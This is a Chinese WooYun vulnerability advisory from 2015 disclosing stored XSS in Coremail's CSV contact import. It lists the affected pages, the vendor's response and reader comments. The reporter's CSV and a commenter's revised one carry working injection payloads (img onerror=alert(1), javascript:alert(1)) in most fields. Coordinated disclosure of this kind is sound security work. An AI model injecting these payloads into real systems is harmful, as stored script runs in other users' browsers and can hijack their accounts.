当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090279

漏洞标题:Coremail某功能多处存储型XSS

相关厂商:Coremail盈世信息科技(北京)有限公司

漏洞作者: phith0n

提交时间:2015-01-06 17:03

修复时间:2015-04-06 17:04

公开时间:2015-04-06 17:04

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:6

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-06: 细节已通知厂商并且等待厂商处理中
2015-01-06: 厂商已经确认,细节仅向厂商公开
2015-01-09: 细节向第三方安全合作伙伴开放
2015-03-02: 细节向核心白帽子及相关领域专家公开
2015-03-12: 细节向普通白帽子公开
2015-03-22: 细节向实习白帽子公开
2015-04-06: 细节向公众公开

简要描述:

漏洞还是得交乌云。

详细说明:

coremail在个人通讯录处可以导入联系人,格式为csv。

01.jpg


导入如下CSV:

联系组,姓名,电子邮件地址,住宅地址,住宅地址 邮政编码,住宅电话,移动电话,单位,商务地址,商务地址 邮政编码,商务电话,商务传真,生日,即时信息地址,网页,__cm_group
aa</textarea><img src=1 onerror=alert(1)>aaaaa,</textarea><img src=1 onerror=alert(1)>,</textarea><img src=1 onerror=alert(1)>@qq.com,,,,13132132132,<img src=1 onerror=alert(1)>,<img src=1 onerror=alert(1)>,,<img src=1 onerror=alert(1)>,,19881212,<img src=1 onerror=alert(1)>,javascript:alert(1)
,,,,,,,,,,,,,,,FRIENDS=<img src=1 onerror=alert(1)>
,,,,,,,,,,,,,,,FAMILY=<img src=1 onerror=alert(1)>
,,,,,,,,,,,,,,,COWORKERS=<img src=1 onerror=alert(1)>
,,,,,,,,,,,,,,,NETFRIENDS=网友
,,,,,,,,,,,,,,,VIP=重要联系人


可见主页面已经转义了,没有触发:

02.jpg


但各个功能页面都存在触发的问题,列举如下:
1.新建联系组时触发:

08.jpg


03.jpg


2.打印联系人时触发:

04.jpg


05.jpg


3.编辑组时触发:

06.jpg


07.jpg


4.清空联系人邮件时触发:

09.jpg


10.jpg

漏洞证明:

见详细说明。

修复方案:

dom操作该过滤的过滤。

版权声明:转载请注明来源 phith0n@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2015-01-06 17:36

厂商回复:

谢谢提交,该问题在实际应用中发生的可能性不大,另在新版中已修复。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-01-06 17:58 | Matt 认证白帽子 ( 普通白帽子 | Rank:523 漏洞数:107 | 承接代码审计 http://codescan.cn/)

    有源码么

  2. 2015-01-06 18:06 | 付弘雪 ( 路人 | Rank:16 漏洞数:10 | 希望和业内各位大牛多多交流)

    这厂商回复也是醉了

  3. 2015-01-06 19:50 | Master ( 路人 | Rank:29 漏洞数:10 )

    吊/

  4. 2015-01-26 17:45 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @付弘雪 自己X自己

  5. 2015-02-09 11:34 | plane636 ( 普通白帽子 | Rank:160 漏洞数:16 )

    洞主给的csv有问题,我测试的时候没有倒进去,发一个我导入成功的联系组,姓名,电子邮件地址,住宅地址,住宅地址 邮政编码,住宅电话,移动电话,单位,商务地址,商务地址 邮政编码,商务电话,商务传真,生日,即时信息地址,网页,__cm_groupFRIENDS,<img src=1 onerror=alert(1)>,<img src=1 onerror=alert(1)>@qq.com,<img src=1 onerror=alert(1)>,<img src=1 onerror=alert(1)>,<img src=1 onerror=alert(1)>,<img src=1 onerror=alert(1)>,<img src=1 onerror=alert(1)>,<img src=1 onerror=alert(1)>,<img src=1 onerror=alert(1)>,<img src=1 onerror=alert(1)>,<img src=1 onerror=alert(1)>,,<img src=1 onerror=alert(1)>,<img src=1 onerror=alert(1)>,,,,,,,,,,,,,,,FRIENDS=朋友,,,,,,,,,,,,,,,FAMILY=亲人,,,,,,,,,,,,,,,COWORKERS=同事,,,,,,,,,,,,,,,NETFRIENDS=网友,,,,,,,,,,,,,,,VIP=重要联系人

  6. 2015-04-06 18:09 | xsser_w ( 普通白帽子 | Rank:112 漏洞数:33 | 哎)

    恩 我也测到了 只是报给了公司